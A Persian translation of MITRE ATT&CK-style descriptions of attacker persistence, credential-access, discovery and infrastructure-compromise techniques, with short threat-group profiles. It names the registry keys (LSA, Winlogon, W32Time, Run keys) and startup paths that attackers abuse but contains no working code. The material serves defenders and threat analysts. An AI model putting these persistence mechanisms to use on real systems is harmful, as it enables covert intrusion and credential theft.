دشمنان ممکن است با تغییر اسکریپت‌های RCکه در طول راه‌اندازی یک سیستم شبه یونیکس اجرا می‌شوند، پایداری خود را ایجاد کنند. این فایل‌ها به مدیران سیستم اجازه می‌دهند تا در هنگام راه‌اندازی، خدمات سفارشی را برای سطوح مختلف اجرا نقشه‌برداری و شروع کنند. اسکریپت های RC برای اصلاح به امتیازات ریشه نیاز دارند. دشمنان می توانند با افزودن یک مسیر مخرب باینری یا دستورات پوسته به rc.common ,rc.local و سایر اسکریپت های RC خاص برای توزیع شبه یونیکس، پایداری را ایجاد کنند. پس از راه اندازی مجدد، سیستم محتویات اسکریپت را به صورت روت اجرا می کند و در نتیجه ماندگاری ایجاد می کند. سوء استفاده دشمن از اسکریپت های RC به ویژه برای توزیع های سبک وزن یونیکس با استفاده از کاربر ریشه به عنوان پیش فرض، مانند اینترنت اشیا یا سیستم های جاسازی شده، موثر است. چندین سیستم شبه یونیکس به Systemd نقل مکان کرده اند و استفاده از اسکریپت های RCرا منسوخ کرده اند. اکنون این یک مکانیسم منسوخ در macOS به نفع Launchd است. این تکنیک را می‌توان در Mac OS X Panther نسخه 10.3 و نسخه‌های قبلی که هنوز اسکریپت‌های RC را اجرا می‌کنند، استفاده کرد. برای حفظ سازگاری به عقب، برخی از سیستم‌ها، مانند اوبونتو، اسکریپت‌های RCرا در صورتی که با مجوزهای صحیح فایل وجود داشته باشند، اجرا می‌کنند.

اسکریپت های راه اندازی اولیه یا ورود به سیستم: موارد راه اندازی

Boot or Logon Initialization Scripts: Startup Items

دشمنان ممکن است از آیتم‌های راه‌اندازی استفاده کنند که به‌طور خودکار در هنگام راه‌اندازی اولیه اجرا می‌شوند تا پایداری ایجاد کنند. موارد راه‌اندازی در مرحله نهایی فرآیند بوت اجرا می‌شوند و حاوی اسکریپت‌های پوسته یا سایر فایل‌های اجرایی به همراه اطلاعات پیکربندی مورد استفاده توسط سیستم برای تعیین ترتیب اجرا برای همه موارد راه‌اندازی هستند. این از نظر فنی یک فناوری منسوخ شده است (که توسط Launch Daemon جایگزین شده است) و بنابراین پوشه مناسب، /Library/StartupItems به طور پیش فرض در سیستم تضمین نمی شود، اما به نظر می رسد به طور پیش فرض در macOS Sierra وجود داشته باشد. آیتم راه اندازی دایرکتوری است که لیست ویژگی های اجرایی و پیکربندی آن (plist)، StartupParameters.plist، در دایرکتوری سطح بالا قرار دارد. یک حریف می‌تواند پوشه‌ها/فایل‌های مناسب را در فهرست StartupItems ایجاد کند تا مکانیسم پایداری خود را ثبت کند. علاوه بر این، از آنجایی که StartupItems در مرحله راه‌اندازی macOS اجرا می‌شود، به‌عنوان کاربر ریشه بالا اجرا می‌شود.

برنامه‌های افزودنی مرورگر

Browser Extensions

ممکن است دشمنان از افزونه های مرورگر اینترنت برای ایجاد دسترسی دائمی به سیستم های قربانی سوء استفاده کنند. افزونه‌ها یا افزونه‌های مرورگر برنامه‌های کوچکی هستند که می‌توانند قابلیت‌ها را اضافه کرده و جنبه‌هایی از مرورگرهای اینترنت را سفارشی کنند. آنها را می توان مستقیماً یا از طریق فروشگاه برنامه مرورگر نصب کرد و به طور کلی به هر چیزی که مرورگر می‌تواند به آن دسترسی داشته باشد دسترسی و مجوز دارد.برنامه‌های افزودنی مخرب را می‌توان از طریق دانلودهای فروشگاه برنامه‌های مخرب که به عنوان برنامه‌های افزودنی قانونی ظاهر می‌شوند، از طریق مهندسی اجتماعی، یا توسط دشمنی که قبلاً یک سیستم را به خطر انداخته است، در مرورگر نصب کرد. امنیت را می توان در فروشگاه های برنامه مرورگر محدود کرد، بنابراین ممکن است برای برنامه های افزودنی مخرب شکست دادن اسکنرهای خودکار دشوار نباشد. بسته به مرورگر، دشمنان همچنین ممکن است URL به‌روزرسانی یک برنامه افزودنی را برای نصب به‌روزرسانی‌ها از سرور کنترل‌شده دشمن دستکاری کنند یا فایل پیکربندی تلفن همراه را برای نصب بی‌صدا پسوندهای اضافی دستکاری کنند. قبل از macOS11، دشمنان می‌توانستند بی‌صدا افزونه‌های مرورگر را از طریق خط فرمان با استفاده از ابزار پروفایل‌ها برای نصب فایل‌های مخرب .mobileconfig نصب کنند. درmacOS 11+ ، استفاده از ابزار پروفایل‌ها دیگر نمی‌تواند نمایه‌های پیکربندی را نصب کند، اما فایل‌های .mobileconfig را می‌توان با تعامل کاربر نصب و نصب کرد. پس از نصب برنامه افزودنی، می‌تواند وب‌سایت‌ها را در پس‌زمینه مرور کند، تمام اطلاعاتی را که کاربر در مرورگر وارد می‌کند (از جمله اعتبارنامه‌ها) بدزدد و به‌عنوان یک نصب‌کننده برای RAT استفاده شود. برای ماندگاریهمچنین مواردی از بات‌نت‌ها وجود داشته است که از یک درب پشتی دائمی از طریق برنامه‌های افزودنی مخرب Chrome استفاده می‌کنند. همچنین نمونه‌های مشابهی از برنامه‌های افزودنی برای فرمان و کنترل استفاده شده است.

بوت یا ورود به سیستم شروع خودکار اجرا

Boot or Logon Autostart Execution

دشمنان ممکن است تنظیمات سیستم را برای اجرای خودکار یک برنامه در حین بوت شدن یا ورود به سیستم پیکربندی کنند تا پایداری خود را حفظ کنند یا امتیازات سطح بالاتر را در سیستم های در معرض خطر به دست آورند. سیستم‌های عامل ممکن است مکانیسم‌هایی برای اجرای خودکار یک برنامه در هنگام راه‌اندازی سیستم یا ورود به حساب داشته باشند. این مکانیسم‌ها ممکن است شامل برنامه‌هایی باشد که به طور خودکار اجرا می‌شوند که در دایرکتوری‌های مشخص شده قرار می‌گیرند یا توسط مخازنی که اطلاعات پیکربندی را ذخیره می‌کنند، مانند رجیستری ویندوز، ارجاع داده می‌شوند. یک دشمن ممکن است با اصلاح یا گسترش ویژگی‌های هسته به همان هدف دست یابد. از آنجایی که برخی از برنامه‌های راه‌اندازی خودکار یا ورود به سیستم با امتیازات بالاتر اجرا می‌شوند، دشمن ممکن است از آنها برای افزایش امتیازات استفاده کند.

بوت یا ورود به سیستم اجرا خودکار: کلیدهای اجرای رجیستری / پوشه راه اندازی

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

دشمنان ممکن است با افزودن یک برنامه به پوشه راه‌اندازی یا ارجاع دادن به آن با یک کلید اجرای رجیستری به پایداری دست یابند. افزودن یک ورودی به "کلیدهای اجرا" در رجیستری یا پوشه راه‌اندازی باعث می‌شود برنامه ارجاع‌شده در هنگام ورود کاربر اجرا شود. این برنامه‌ها تحت شرایط کاربر اجرا می‌شوند و مجوزهای مربوط به مرحله حساب را خواهند داشت. قرار دادن یک برنامه در یک پوشه راه‌اندازی همچنین باعث می‌شود که وقتی کاربر وارد می‌شود، آن برنامه اجرا شود. یک مکان پوشه راه‌اندازی برای حساب‌های کاربری فردی و همچنین یک پوشه راه‌اندازی در سراسر سیستم وجود دارد که بدون در نظر گرفتن اینکه کدام حساب کاربری وارد شده است بررسی می‌شود. مسیر پوشه راه اندازی برای کاربر فعلی به شرح زیر است: C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup مسیر پوشه راه اندازی برای همه کاربران: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

بوت یا ورود به سیستم شروع خودکار اجرا: بسته احراز هویت

Boot or Logon Autostart Execution: Authentication Package

هنگامی که سیستم بوت می شود، دشمنان ممکن است از بسته های احراز هویت برای اجرای DLL سوء استفاده کنند. DLLهای بسته احراز هویت ویندوز توسط فرآیند محلی امنیت (LSA) در شروع سیستم بارگیری می‌شوند. آنها از چندین فرآیند ورود به سیستم و چندین پروتکل امنیتی برای سیستم عامل پشتیبانی می کنند. دشمنان می توانند با قرار دادن ارجاع به یک باینری در مکان رجیستری ویندوز از مکانیسم شروع خودکار ارائه شده توسط بسته های احراز هویت LSA برای تداوم استفاده کنند. HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ با مقدار کلیدی: "Authentication Packages"=<target binary> پس از بارگیری بسته های احراز هویت، کدهای باینری توسط سیستم اجرا می شوند.

بوت یا ورود به سیستم شروع خودکار اجرا: ارائه دهندگان زمان

Boot or Logon Autostart Execution: Time Providers

هنگامی که سیستم بوت می شود، ممکن است دشمنان از ارائه دهندگان زمان برای اجرای DLL سوء استفاده کنند. سرویس (W32Time) همگام سازی زمان را در دامنه ها و درون دامنه ها فعال می‌کند. ارائه دهندگان زمان W32Time مسئول بازیابی مهرهای زمانی از منابع سخت افزاری/شبکه و خروجی این مقادیر به سایر مشتریان شبکه هستند. ارائه‌دهندگان زمان به‌عنوان کتابخانه‌های پیوند پویا ( DLL) پیاده‌سازی می‌شوند که در کلیدهای فرعی ثبت می‌شوند. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\ مدیر ارائه‌دهنده زمان، که توسط مدیر کنترل سرویس هدایت می‌شود، ارائه‌دهندگان زمان فهرست‌شده و فعال شده تحت این کلید را هنگام راه‌اندازی سیستم و/یا هر زمان که پارامترها تغییر می‌کنند، بارگیری و راه‌اندازی می‌کند.دشمنان ممکن است از این معماری برای ایجاد تداوم سوء استفاده کنند، به ویژه با ثبت و فعال کردن یک DLL مخرب به عنوان ارائه‌دهنده زمان. امتیازات سرپرست برای ثبت نام ارائه‌دهنده زمانی مورد نیاز است، اگرچه اجرا در زمینه حساب Local Service اجرا می‌شود.

بوت یا ورود به سیستم اجرا خودکار: Winlogon Helper DLL

Boot or Logon Autostart Execution: Winlogon Helper DLL

هنگامی که کاربر وارد سیستم می‌شود، ممکن است دشمنان از ویژگی‌های Winlogon برای اجرای DLL و/یا فایل‌های اجرایی سوء استفاده کنند. Winlogon.exe یک مؤلفه ویندوز است که مسئول اقدامات در هنگام ورود/خروج و همچنین توالی توجه ایمن ( SAS) است که توسط Ctrl-Alt-Delete فعال می‌شود. ورودی های رجیستری در HKLM\Software[\Wow6432Node\]\Microsoft\WindowsNT\CurrentVersion\Winlogon\ و HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ برای مدیریت برنامه های کمکی اضافی و عملکردهایی که از Winlogon پشتیبانی می کنند استفاده می شود. تغییرات مخرب در این کلیدهای رجیستری ممکن است باعث شود Winlogon DLL ها و/یا فایل های اجرایی مخرب را بارگیری و اجرا کند.

بوت یا ورود به سیستم شروع خودکار اجرا: ارائه دهنده پشتیبانی امنیتی

Boot or Logon Autostart Execution: Security Support Provider

هنگامی که سیستم بوت می شود، دشمنان ممکن است از ارائه دهندگان پشتیبانی امنیتی (SSPs)برای اجرای DLL سوءاستفاده کنند. Windows SSP DLLها در هنگام شروع سیستم در فرآیند (LSA) بارگذاری می‌شوند. پس از بارگیری در LSA,DLLهایSSP به رمزهای عبور رمزگذاری شده و متن ساده که در ویندوز ذخیره می شوند، مانند رمز عبور دامنه یا پین کارت هوشمند هر کاربر وارد شده دسترسی دارند. پیکربندی SSP در دو کلید رجیستری ذخیره می شود: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages و HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages

ساخت تصویر روی هاست

Build Image on Host

دشمنان ممکن است یک تصویر کانتینری را مستقیماً روی یک میزبان بسازند تا از دفاعی که برای بازیابی تصاویر مخرب از یک ثبت عمومی نظارت می کند دور بزنند. یک درخواست ساخت از راه دور ممکن است به Docker API ارسال شود که شامل یک Dockerfile است که یک تصویر پایه واقعی مانند alpine را از یک رجیستری عمومی یا محلی می‌کشد و سپس یک تصویر سفارشی بر روی آن ایجاد می‌کند. دشمن ممکن است از آن API ساخت استفاده کند. برای ساختن یک تصویر سفارشی بر روی هاست که شامل بدافزار دانلود شده از سرور C2 است و سپس آنها ممکن است از Deploy Container با استفاده از آن تصویر سفارشی استفاده کنند. اگر تصویر پایه از یک رجیستری عمومی بیرون کشیده شود، دفاع احتمالاً تصویر را مخرب تشخیص نمی دهد زیرا یک تصویر وانیلی است. اگر تصویر پایه قبلاً در یک رجیستری محلی قرار داشته باشد، ممکن است کشش حتی کمتر مشکوک تلقی شود زیرا تصویر از قبل در محیط است.

نیروی بی رحم

Brute Force

هنگامی که رمز عبور ناشناخته است یا زمانی که هش رمز عبور به دست می آید، دشمنان ممکن است از تکنیک‌های brute force برای دسترسی به حساب ها استفاده کنند. بدون اطلاع از رمز عبور یک حساب یا مجموعه ای از حساب ها، دشمن ممکن است به طور سیستماتیک رمز عبور را با استفاده از مکانیزم تکراری یا تکراری حدس بزند. گذرواژه‌های اجباری وحشیانه می‌توانند از طریق تعامل با سرویسی انجام شوند که اعتبار آن اعتبارنامه‌ها را بررسی می‌کند یا به‌صورت آفلاین در برابر داده‌های اعتبارنامه‌ای که قبلاً به دست آورده‌اید، مانند درهم‌سازی رمز عبور. مجوزهای اجباری بی رحمانه ممکن است در نقاط مختلفی در طول یک نقض رخ دهد. به عنوان مثال، دشمنان ممکن است با استفاده از دانش جمع‌آوری‌شده از سایر رفتارهای پس از سازش مانند تخلیه اعتبار سیستم‌عامل، کشف حساب، یا کشف خط‌مشی رمز عبور، دسترسی اجباری به حساب‌های معتبر را در محیط قربانی اعمال کنند. دشمنان همچنین ممکن است فعالیت های اجباری وحشیانه را با رفتارهایی مانند خدمات از راه دور خارجی به عنوان بخشی از دسترسی اولیه ترکیب کنند.

کشف نشانک مرورگر

Browser Bookmark Discovery

دشمنان ممکن است نشانک‌های مرورگر را برشمارند تا درباره میزبان‌های در معرض خطر بیشتر بیاموزند. نشانک‌های مرورگر ممکن است اطلاعات شخصی کاربران (مانند سایت‌های بانکی، علایق، رسانه‌های اجتماعی و غیره) و همچنین جزئیات مربوط به منابع شبکه داخلی مانند سرورها، ابزارها / داشبوردها یا سایر زیرساخت‌های مرتبط را نشان دهند. نشانک‌های مرورگر همچنین ممکن است پس از دسترسی دشمن به اعتبارنامه‌های معتبر، به‌ویژه اعتبارنامه‌های موجود در فایل‌های مرتبط با ورودهای ذخیره‌شده توسط مرورگر، اهداف دیگری را برجسته کنند. مکان‌های ذخیره‌سازی خاص بر اساس پلتفرم و یا برنامه متفاوت است، اما نشانک‌های مرورگر معمولاً در فایل‌ها/پایگاه‌های داده محلی ذخیره می‌شوند.

ربودن جلسه مرورگر

Browser Session Hijacking

دشمنان ممکن است از آسیب‌پذیری‌های امنیتی و عملکرد ذاتی نرم‌افزار مرورگر برای تغییر محتوا، اصلاح رفتار کاربر، و رهگیری اطلاعات به عنوان بخشی از تکنیک‌های مختلف ربودن جلسه مرورگر استفاده کنند. یک مثال خاص زمانی است که یک دشمن نرم‌افزاری را به مرورگر تزریق می‌کند که به آنها اجازه می‌دهد کوکی‌ها، جلسات HTTP و گواهی‌های کلاینت SSL یک کاربر را به ارث ببرند و سپس از مرورگر به عنوان راهی برای چرخش به یک اینترانت تأیید شده استفاده کنند. اجرای رفتارهای مبتنی بر مرورگر مانند چرخش ممکن است به مجوزهای فرآیند خاصی مانند SeDebugPrivilege و یا حقوق مدیریت با یکپارچگی بالا نیاز داشته باشد. مثال دیگر شامل چرخش ترافیک مرورگر از مرورگر حریف از طریق مرورگر کاربر با تنظیم یک پروکسی است که ترافیک وب را تغییر مسیر می دهد. این به هیچ وجه ترافیک کاربر را تغییر نمی دهد و به محض بسته شدن مرورگر می توان ارتباط پراکسی را قطع کرد. حریف زمینه امنیتی هر فرآیند مرورگری را که پروکسی به آن تزریق می شود، فرض می کند. مرورگرها معمولاً برای هر برگه ای که باز می شود فرآیند جدیدی ایجاد می کنند و مجوزها و گواهی ها بر اساس آن از هم جدا می شوند. با این مجوزها، حریف به طور بالقوه می تواند به هر منبعی در اینترانت، مانند Sharepoint یا وب میل، که از طریق مرورگر قابل دسترسی است و مرورگر مجوزهای کافی را دارد، مرور کند. چرخش مرورگر همچنین ممکن است امنیت ارائه شده توسط احراز هویت 2 عاملی را دور بزند.

پشت درب دیپلماسی

BackdoorDiplomacy

BackdoorDiplomacy یک گروه تهدید جاسوسی سایبری است که حداقل از سال 2017 فعال بوده است. BackdoorDiplomacy وزارتخانه های امور خارجه و شرکت های مخابراتی در آفریقا، اروپا، خاورمیانه و آسیا را هدف قرار داده است.

یک گروه تهدید خاورمیانه است

BlackOasis

BlackOasisیک گروه تهدید خاورمیانه است که گمان می‌رود مشتری گروه Gamma باشد. این گروه به شخصیت‌های برجسته سازمان ملل و همچنین وبلاگ‌نویسان مخالف، فعالان، خبرنگاران اخبار منطقه ای و اتاق‌های فکر علاقه نشان داده است.گروهی که توسط مایکروسافت به نامNEODYMIUM شناخته می‌شود، طبق گزارش‌ها، ارتباط نزدیکی با عملیات BlackOasis دارد.

یک گروه جاسوسی سایبری

BlackTech

BlackTech یک گروه جاسوسی سایبری است که علیه اهدافی در شرق آسیا، به ویژه تایوان، و گاهی اوقات، ژاپن و هنگ کنگ فعالیت می کند.

مرغ مقلد آبی

Blue Mockingbird

Blue Mockingbird مجموعه‌ای از فعالیت‌های مشاهده‌شده است که شامل بارهای استخراج ارز دیجیتال Monero به شکل کتابخانه پیوند پویا ( DLL) در سیستم‌های ویندوز است. اولین ابزار مشاهده شده Blue Mockingbird در دسامبر 2019 ایجاد شد.

یک کمپین جاسوسی سایبری

Bouncing Golf

Bouncing Golf یک کمپین جاسوسی سایبری است که کشورهای خاورمیانه را هدف قرار می دهد.

یک گروه جاسوسی سایبری

BRONZE BUTLER

BRONZE BUTLER یک گروه جاسوسی سایبری با منشاء احتمالی چینی است که حداقل از سال 2008 فعال بوده است. این گروه عمدتاً سازمان های ژاپنی، به ویژه سازمان های دولتی، بیوتکنولوژی، تولید الکترونیک و شیمی صنعتی را هدف قرار می دهد.

حساب‌های در معرض خطر

Compromise Accounts

دشمنان ممکن است حساب‌هایی را با سرویس‌هایی که می‌توانند در هنگام هدف‌گیری استفاده شوند، به خطر بیاندازند. برای عملیات شامل مهندسی اجتماعی، استفاده از شخصیت آنلاین ممکن است مهم باشد. به جای ایجاد و پرورش حساب (یعنی ایجاد حساب)، دشمنان ممکن است حساب‌های موجود را به خطر بیاندازند. در صورت داشتن رابطه یا آگاهی از شخص آسیب‌دیده، استفاده از یک شخصیت موجود ممکن است باعث ایجاد اعتماد در قربانی بالقوه شود. روش‌های مختلفی برای به خطر انداختن حساب‌ها وجود دارد، مانند جمع‌آوری اعتبار از طریق Phishing for Information ، خرید اعتبار از سایت‌های شخص ثالث یا مجبور کردن اعتبارنامه‌ها.

حساب‌های در معرض خطر: حساب‌های رسانه‌های اجتماعی

Compromise Accounts: Social Media Accounts

دشمنان ممکن است حساب‌های رسانه‌های اجتماعی را که می‌توانند در هنگام هدف‌گیری استفاده شوند، به خطر بیاندازند. برای عملیاتی که شامل مهندسی اجتماعی می‌شود، استفاده از شخصیت آنلاین ممکن است مهم باشد. به جای ایجاد و پرورش پروفایل‌های رسانه‌های اجتماعی (یعنی حساب‌های رسانه‌های اجتماعی)، دشمنان ممکن است حساب‌های رسانه‌های اجتماعی موجود را به خطر بیاندازند. استفاده از یک شخصیت موجود ممکن است سطحی از اعتماد را در یک قربانی بالقوه ایجاد کند، اگر آنها رابطه یا شناختی از شخصیت در معرض خطر داشته باشند. روش‌های مختلفی برای به خطر انداختن حساب‌های رسانه‌های اجتماعی وجود دارد، مانند جمع‌آوری اعتبار از طریق فیشینگ برای اطلاعات، خرید اعتبار از سایت‌های شخص ثالث، یا با اجبار بی‌رحمانه اعتبار (مثلاً: استفاده مجدد از گذرواژه ناشی از موارد نقض اعتبار). قبل از به خطر انداختن حساب‌های رسانه‌های اجتماعی، دشمنان ممکن است شناسایی انجام دهند تا تصمیم‌گیری در مورد اینکه کدام حساب‌ها برای پیشبرد عملکردشان به خطر بیفتند، مطلع شوند. پرسوناها ممکن است در یک سایت واحد یا در چندین سایت (مثلاً فیس بوک، لینکدین، توییتر و غیره) وجود داشته باشند. حساب‌های رسانه‌های اجتماعی در معرض خطر ممکن است نیاز به توسعه بیشتری داشته باشند، این می‌تواند شامل پر کردن یا اصلاح اطلاعات نمایه، توسعه بیشتر شبکه‌های اجتماعی یا ترکیب عکس‌ها باشد. دشمنان می‌توانند از پروفایل رسانه‌های اجتماعی به خطر افتاده برای ایجاد ارتباطات جدید یا ربودن ارتباطات موجود با اهداف مورد نظر استفاده کنند. این ارتباطات ممکن است مستقیم باشند یا ممکن است شامل تلاش برای اتصال از طریق دیگران باشد. نمایه‌های در معرض خطر ممکن است در سایر مراحل چرخه حیات دشمن، مانند هنگام دسترسی اولیه (مثلاً Spearphishing از طریق سرویس) مورد استفاده قرار گیرند.

حساب‌های در معرض خطر: حساب‌های ایمیل

Compromise Accounts: Email Accounts

دشمنان ممکن است حساب‌های ایمیلی را که می‌توان در هنگام هدف‌گیری استفاده کرد، به خطر انداخت. دشمنان می توانند از حساب های ایمیل در معرض خطر برای پیشبرد عملیات خود استفاده کنند، مانند استفاده از آنها برای انجام فیشینگ برای اطلاعات یا فیشینگ. استفاده از یک پرسونای موجود با یک حساب ایمیل در معرض خطر ممکن است سطحی از اعتماد را در یک قربانی احتمالی ایجاد کند، در صورتی که آنها رابطه یا شناختی از شخصیت در معرض خطر داشته باشند. از حساب‌های ایمیل در معرض خطر نیز می‌توان در دستیابی به زیرساخت‌ها (مثلاً دامنه‌ها) استفاده کرد. روش‌های مختلفی برای به خطر انداختن حساب‌های ایمیل وجود دارد، مانند جمع‌آوری اعتبار از طریق فیشینگ برای اطلاعات، خرید اعتبار از سایت‌های شخص ثالث، یا با اجبار بی‌رحمانه اعتبارنامه‌ها (مثلاً استفاده مجدد از گذرواژه از موارد ناقض اعتبار). قبل از به خطر انداختن حساب‌های ایمیل، دشمنان ممکن است شناسایی انجام دهند تا تصمیم‌گیری در مورد اینکه کدام حساب‌ها به خطر بیفتند تا عملکرد خود را بیشتر کنند. دشمنان م‌توانند از یک حساب ایمیل در معرض خطر برای ربودن رشته‌های ایمیل موجود با اهداف مورد نظر استفاده کنند.

زیرساخت سازش

Compromise Infrastructure

دشمنان ممکن است زیرساخت‌های شخص ثالثی را که می‌تواند در هنگام هدف‌گیری استفاده شود، به خطر بیاندازند. راه‌حل‌های زیرساخت شامل سرورهای فیزیکی یا ابری، دامنه‌ها و خدمات وب شخص ثالث است. به جای خرید یا اجاره زیرساخت، دشمن ممکن است زیرساخت‌ها را به خطر بیندازد و از آن در مراحل دیگر چرخه حیات دشمن استفاده کند. علاوه بر این، دشمنان ممکن است ماشین‌های متعددی را برای ایجاد بات نت مورد استفاده قرار دهند. استفاده از زیرساخت‌های آسیب‌دیده به دشمن این امکان را می‌دهد که یک عملیات را مرحله‌بندی، راه‌اندازی و اجرا کند. زیرساخت‌های آسیب‌دیده می‌توانند به عملیات متخاصم کمک کنند تا با ترافیکی که معمولی تلقی می‌شود، مانند تماس با شهرت بالا یا سایت‌های معتبر، ترکیب شوند.

زیرساخت سازش: دامنه‌ها

Compromise Infrastructure: Domains

دشمنان ممکن است دامنه‌ها و/یا زیردامنه‌هایی را که می‌توان در طول هدف‌گیری استفاده کرد بربایند. ربودن ثبت دامنه عمل تغییر ثبت نام دامنه بدون اجازه ثبت کننده اصلی است. یک دشمن ممکن است به حساب ایمیل شخصی که به عنوان مالک دامنه فهرست شده است دسترسی پیدا کند. سپس حریف می‌تواند ادعا کند که رمز عبور خود را فراموش کرده است تا تغییراتی در ثبت دامنه ایجاد کند. سایر امکانات شامل مهندسی اجتماعی یک میز کمک ثبت دامنه برای دسترسی به یک حساب کاربری یا استفاده از شکاف‌های فرآیند تجدید است. ربودن زیر دامنه زمانی رخ می‌دهد که سازمان‌ها ورودی‌های DNS داشته باشند که به منابع موجود یا از بین‌رفته اشاره می‎کند. در چنین مواردی، یک حریف ممکن است کنترل یک زیر دامنه را برای انجام عملیات با بهره مندی از اعتماد مرتبط با آن دامنه به دست بگیرد.

زیرساخت سازش: سرور DNS

Compromise Infrastructure: DNS Server

دشمنان ممکن است سرورهای DNS شخص ثالثی را که می‌توانند در هنگام هدف‌گیری مورد استفاده قرار گیرند، به خطر بیاندازند. در طول فعالیت پس از سازش، دشمنان ممکن است از ترافیک DNS برای وظایف مختلف، از جمله برای فرمان و کنترل (مثلاً پروتکل لایه برنامه) استفاده کنند. به جای راه‌اندازی سرورهای DNS خود، دشمنان ممکن است برای پشتیبانی از عملیات، سرورهای DNS شخص ثالث را به خطر بیاندازند. با به خطر انداختن سرورهای DNS، دشمنان می‌توانند رکوردهای DNS را تغییر دهند. چنین کنترلی می‌تواند امکان هدایت مجدد ترافیک سازمان را فراهم کند و تلاش‌های جمع‌آوری و دسترسی به اعتبار را برای دشمن تسهیل کند. همچنین ممکن است دشمنان بتوانند به‌طور بی‌صدا زیر دامنه‌هایی را که به سمت سرورهای مخرب هدایت می‌شوند، بدون اشاره به مالک واقعی سرور DNS ایجاد کنند.

زیرساخت سازش: سرور خصوصی مجازی

Compromise Infrastructure: Virtual Private Server

دشمنان ممکن است سرورهای خصوصی مجازی شخص ثالث(VPS) را که می‌توانند در هنگام هدف قرار دادن استفاده شوند، به خطر بیاندازند. ارائه دهندگان خدمات ابری مختلفی وجود دارند که ماشین‌های مجازی/کانتینرها را به عنوان یک سرویس می‌فروشند. دشمنان ممکن است VPSهای خریداری شده توسط نهادهای شخص ثالث را به خطر بیاندازند. با به خطر انداختن یک VPSبرای استفاده به عنوان زیرساخت، دشمنان می‌توانند اتصال فیزیکی عملیات به خود را دشوار کنند. به خطر انداختن یک VPS برای استفاده در مراحل بعدی چرخه حیات دشمن، مانند فرماندهی و کنترل، می‌تواند به دشمنان اجازه دهد از همه جا و اعتماد مرتبط با ارائه دهندگان خدمات ابری با شهرت بالاتر و همچنین موارد اضافه شده توسط شخص ثالث در معرض خطر بهره‌مند شوند.

زیرساخت سازش: سرور

Compromise Infrastructure: Server

دشمنان ممکن است سرورهای شخص ثالثی را که می‌توانند در هنگام هدف‌گیری استفاده شوند، به خطر بیاندازند. استفاده از سرورها به حریف اجازه می‌دهد تا عملیات را مرحله‌‎بندی، راه اندازی و اجرا کند. در طول فعالیت پس از سازش، دشمنان ممکن است از سرورها برای کارهای مختلف از جمله برای فرماندهی و کنترل استفاده کنند. به جای خرید یک سرور یا سرور خصوصی مجازی، دشمنان ممکن است سرورهای شخص ثالث را برای پشتیبانی از عملیات به خطر بیاندازند. دشمنان همچنین ممکن است مانند، Drive-by Compromiseسرورهای وب را برای پشتیبانی از عملیات حفره آب به خطر بیاندازند.

زیرساخت سازش: بات نت

Compromise Infrastructure: Botnet

دشمنان ممکن است سیستم‌های شخص ثالث متعددی را به خطر بیاندازند تا یک بات‌نت تشکیل دهند که می‌تواند در هنگام هدف‌گیری استفاده شود. بات‌نت شبکه‌ای از سیستم‌های در معرض خطر است که می‌توان برای انجام وظایف هماهنگ دستور داد. دشمنان ممکن است بات نت خود را با به خطر انداختن سیستم‌های شخص ثالث متعدد بسازند. دشمنان همچنین ممکن است یک بات‌نت موجود را تصاحب کنند، مانند هدایت مجدد ربات‌ها به سرورهای C2 تحت کنترل دشمن. با داشتن یک بات نت در اختیار دشمنان، ممکن است فعالیت‌های بعدی مانند فیشینگ در مقیاس بزرگ یا انکار سرویس توزیع شده (DDoS) انجام دهند.

زیرساخت سازش: خدمات وب

Compromise Infrastructure: Web Services

دشمنان ممکن است دسترسی به سرویس‌های وب شخص ثالث را که می‌توانند در طول هدف قرار دادن استفاده شوند، به خطر بیاندازند. انواع وب‌سایت‌های محبوب برای کاربران قانونی برای ثبت نام در سرویس‌های مبتنی بر وب وجود دارد، مانند GitHub، Twitter، Dropbox، Google، و غیره. دشمنان ممکن است سعی کنند مالکیت دسترسی یک کاربر قانونی به یک سرویس وب را در اختیار بگیرند و از آن وب سرویس به عنوان استفاده کنند. زیرساخت پشتیبانی از عملیات سایبری چنین سرویس‌های وب می‌توانند در مراحل بعدی چرخه حیات دشمن مورد سوء استفاده قرار گیرند، مانند هنگام فرماندهی و کنترل (وب سرویس) یاExfiltration Over Web Service استفاده از سرویس‌های رایج، مانند سرویس‌هایی که توسط گوگل یا توییتر ارائه می‌شود، مخفی شدن در نویز مورد انتظار را برای دشمنان آسان‌تر می‌کند. با استفاده از یک سرویس وب، به ویژه زمانی که دسترسی از کاربران قانونی دزدیده می‌شود، دشمنان می‌توانند پیوند فیزیکی عملیات را با آنها دشوار کنند.

مترجم فرمان و اسکریپت

Command and Scripting Interpreter

دشمنان ممکن است از مفسر دستورات و اسکریپت برای اجرای دستورات، اسکریپت‌ها یا باینری‌ها سوءاستفاده کنند. این رابط‌ها و زبان‌ها راه‌هایی برای تعامل با سیستم‌های کامپیوتری ارائه می‌کنند و یک ویژگی مشترک در بسیاری از پلتفرم‌های مختلف هستند. اکثر سیستم‌ها دارای رابط خط فرمان داخلی و قابلیت‌های اسکریپت هستند، به عنوان مثال، توزیع‌های macOS و Linux دارای طعمی از Unix Shell هستند در حالی که نصب‌های ویندوز شامل Windows Command Shell و PowerShell هستند. همچنین مفسرهای بین پلتفرمی مانند پایتون و همچنین مفسرهایی که معمولاً با برنامه های مشتری مانند جاوا اسکریپت و ویژوال بیسیک مرتبط هستند وجود دارد. دشمنان ممکن است از این فناوری ها به طرق مختلف به عنوان ابزاری برای اجرای دستورات دلخواه سوء استفاده کنند. دستورات و اسکریپت‌ها را می‌توان در محموله‌های Initial Access قرار داد که به‌عنوان اسناد فریبنده یا به‌عنوان بارهای ثانویه دانلود شده از یک C2 موجود به قربانیان تحویل داده می‌شوند. دشمنان همچنین ممکن است دستورات را از طریق پایانه‌ها یا پوسته‌های تعاملی اجرا کنند و همچنین از سرویس‌های مختلف از راه دور برای دستیابی به اجرای از راه دور استفاده کنند.

مترجم دستورات و اسکریپت: PowerShell

Command and Scripting Interpreter: PowerShell

